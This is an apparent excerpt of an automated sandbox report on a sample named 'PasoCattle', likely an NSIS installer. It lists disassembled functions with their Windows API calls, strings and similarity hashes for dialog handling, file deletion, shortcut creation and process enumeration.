Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

M, xrefs: 00404B6F
@, xrefs: 00404BBC
, xrefs: 00404F65
N, xrefs: 00404C32

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
Delete: DeleteFile("%s"), xrefs: 00406DE8
Delete: DeleteFile failed("%s"), xrefs: 00406E29
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
\*.*, xrefs: 00406D2F

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

GetTTFNameString, xrefs: 00406F33
%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406858
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406A7F

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

GetModuleBaseNameW, xrefs: 004064C0
Module32NextW, xrefs: 0040660A
PSAPI.DLL, xrefs: 00406490
Kernel32.DLL, xrefs: 004065C7
Unknown, xrefs: 00406528
EnumProcesses, xrefs: 004064AE
Process32NextW, xrefs: 004065F4
Process32FirstW, xrefs: 004065E9
CreateToolhelp32Snapshot, xrefs: 004065E1
EnumProcessModules, xrefs: 004064B6
Module32FirstW, xrefs: 004065FF

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

